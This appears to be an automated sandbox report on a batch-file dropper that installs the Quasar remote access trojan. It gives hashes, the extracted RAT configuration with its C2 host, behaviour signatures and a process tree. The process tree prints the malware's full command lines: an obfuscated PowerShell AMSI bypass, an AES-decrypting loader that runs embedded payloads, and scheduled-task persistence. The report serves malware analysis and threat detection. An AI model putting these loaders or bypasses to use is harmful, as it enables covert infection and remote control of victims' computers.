Analysis

  • max time kernel
    42s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 23:36

General

  • Target

    Uni.bat

  • Size

    515KB

  • MD5

    4c2a3be3d5c9464eb441677e41f44fd8

  • SHA1

    c826034a0882d21a39056d745e88622ee9698343

  • SHA256

    45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

  • SHA512

    ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c

  • SSDEEP

    12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

review-tops.gl.at.ply.gg:48212

Mutex

$Sxr-IGnkORFTlshRl7BdTw

Attributes
  • encryption_key

    YDmRBA8wExjQkYgGrHhN

  • install_name

    $sxr-powershell.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Discord

  • subdirectory

    $77

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 5 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:608
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:316
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{303e1b26-3a19-47f2-aad5-23d7db68d203}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3984
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:664
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:948
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:388
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:860
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                1⤵
                • Drops file in System32 directory
                PID:1112
                • C:\Windows\system32\taskhostw.exe
                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                  2⤵
                    PID:3032
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cnqdbBaiGAXP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KpzSPJbAdTzAHH,[Parameter(Position=1)][Type]$GregwOKiai)$uSALalfxawY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+'cted'+'D'+''+[Char](101)+''+'l'+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+',P'+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+'e'+'al'+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'Au'+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$uSALalfxawY.DefineConstructor(''+[Char](82)+''+'T'+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$KpzSPJbAdTzAHH).SetImplementationFlags(''+'R'+'unt'+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+'g'+[Char](101)+'d');$uSALalfxawY.DefineMethod('I'+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+''+'l'+''+'i'+'c'+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+'ByS'+'i'+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t'+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'ual',$GregwOKiai,$KpzSPJbAdTzAHH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+'na'+'g'+''+'e'+''+[Char](100)+'');Write-Output $uSALalfxawY.CreateType();}$NlOcHoaPLzzgK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+'o'+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+'i'+'n'+'3'+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+'a'+'f'+''+'e'+''+'N'+''+'a'+''+[Char](116)+''+'i'+'v'+[Char](101)+''+'M'+''+[Char](101)+''+'t'+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$PugYshjgDccQab=$NlOcHoaPLzzgK.GetMethod(''+'G'+'e'+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+'c'+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+'es'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+','+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EEeskrOKnWqvDcguYBf=cnqdbBaiGAXP @([String])([IntPtr]);$fkKcAxKdEtyxIvUzYnbzlz=cnqdbBaiGAXP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$tlawjsEqJnG=$NlOcHoaPLzzgK.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+'n'+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+[Char](100)+'l'+[Char](108)+'')));$xaZUnzGTqaJEsH=$PugYshjgDccQab.Invoke($Null,@([Object]$tlawjsEqJnG,[Object](''+[Char](76)+''+[Char](111)+'a'+[Char](100)+''+'L'+''+[Char](105)+'bra'+[Char](114)+'yA')));$KGeqzfaDzYxzPGDYf=$PugYshjgDccQab.Invoke($Null,@([Object]$tlawjsEqJnG,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+'ect')));$KFkPgoM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xaZUnzGTqaJEsH,$EEeskrOKnWqvDcguYBf).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$uXlzvfJVKrrwBUesW=$PugYshjgDccQab.Invoke($Null,@([Object]$KFkPgoM,[Object]('A'+[Char](109)+''+'s'+''+'i'+''+'S'+''+[Char](99)+'a'+'n'+''+[Char](66)+''+'u'+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$RpInXiWhNQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGeqzfaDzYxzPGDYf,$fkKcAxKdEtyxIvUzYnbzlz).Invoke($uXlzvfJVKrrwBUesW,[uint32]8,4,[ref]$RpInXiWhNQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uXlzvfJVKrrwBUesW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KGeqzfaDzYxzPGDYf,$fkKcAxKdEtyxIvUzYnbzlz).Invoke($uXlzvfJVKrrwBUesW,[uint32]8,0x20,[ref]$RpInXiWhNQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                    2⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Drops file in System32 directory
                    • Suspicious use of SetThreadContext
                    • Modifies data under HKEY_USERS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of WriteProcessMemory
                    PID:2028
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1124
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                    1⤵
                      PID:1140
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                      • Drops file in System32 directory
                      PID:1216
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1328
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1340
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                            1⤵
                              PID:1368
                              • C:\Windows\system32\sihost.exe
                                sihost.exe
                                2⤵
                                  PID:2736
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1436
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                  1⤵
                                    PID:1528
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1540
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1672
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1680
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                          1⤵
                                            PID:1740
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                            1⤵
                                              PID:1772
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1864
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1948
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1976
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1416
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1412
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                          PID:1572
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2112
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2224
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2404
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2488
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2496
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                      PID:2668
                                                                    • C:\Windows\sysmon.exe
                                                                      C:\Windows\sysmon.exe
                                                                      1⤵
                                                                        PID:2712
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2752
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2744
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2760
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2768
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2944
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3180
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3448
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3532
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:5008
                                                                                          • C:\Windows\system32\net.exe
                                                                                            net file
                                                                                            3⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:2724
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 file
                                                                                              4⤵
                                                                                                PID:3392
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                              3⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Modifies registry class
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2572
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_989_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_989.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                4⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:3384
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_989.vbs"
                                                                                                4⤵
                                                                                                • Checks computer location settings
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4712
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_989.bat" "
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:2792
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net file
                                                                                                    6⤵
                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                    PID:2412
                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                      C:\Windows\system32\net1 file
                                                                                                      7⤵
                                                                                                        PID:3628
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('91jdUL03S+qtiKcnEbLxlX2v4V+KQpEPutZBqgO8E2Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Rx59Q5ZvoQCkoSKd0BimNQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $UBcWZ=New-Object System.IO.MemoryStream(,$param_var); $DoLTg=New-Object System.IO.MemoryStream; $PYnBX=New-Object System.IO.Compression.GZipStream($UBcWZ, [IO.Compression.CompressionMode]::Decompress); $PYnBX.CopyTo($DoLTg); $PYnBX.Dispose(); $UBcWZ.Dispose(); $DoLTg.Dispose(); $DoLTg.ToArray();}function execute_function($param_var,$param2_var){ $MrGmk=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KybaH=$MrGmk.EntryPoint; $KybaH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_989.bat';$yfjds=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_989.bat').Split([Environment]::NewLine);foreach ($pdwUJ in $yfjds) { if ($pdwUJ.StartsWith(':: ')) { $TDafT=$pdwUJ.Substring(3); break; }}$payloads_var=[string[]]$TDafT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                                                                                      6⤵
                                                                                                      • Blocklisted process makes network request
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                      PID:3964
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        "schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
                                                                                                        7⤵
                                                                                                        • Creates scheduled task(s)
                                                                                                        PID:3920
                                                                                                      • C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\$77\$sxr-powershell.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Modifies system certificate store
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:548
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          8⤵
                                                                                                            PID:2524
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:1092
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                              1⤵
                                                                                                PID:3648
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                1⤵
                                                                                                  PID:3844
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                  • Modifies registry class
                                                                                                  PID:4004
                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3544
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                    1⤵
                                                                                                      PID:4940
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                      1⤵
                                                                                                        PID:824
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                        1⤵
                                                                                                          PID:2832
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                          1⤵
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4516
                                                                                                        • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                          "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                          1⤵
                                                                                                            PID:1600
                                                                                                          • C:\Windows\system32\SppExtComObj.exe
                                                                                                            C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4208
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                              1⤵
                                                                                                                PID:1084
                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                1⤵
                                                                                                                  PID:5064
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4604
                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:404
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:4824
                                                                                                                      • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                        C:\Windows\System32\WaaSMedicAgent.exe d72ea9721f25e85977829f815956e0a6 WbXx2TyFNkCqj/CtXs7HVg.0.1.0.0.0
                                                                                                                        1⤵
                                                                                                                          PID:2960
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            2⤵
                                                                                                                              PID:2820
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                            1⤵
                                                                                                                              PID:5080
                                                                                                                            • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                              C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              1⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:2032
                                                                                                                            • C:\Windows\sysWOW64\wbem\wmiprvse.exe
                                                                                                                              C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                              1⤵
                                                                                                                                PID:4808
                                                                                                                              • C:\Windows\servicing\TrustedInstaller.exe
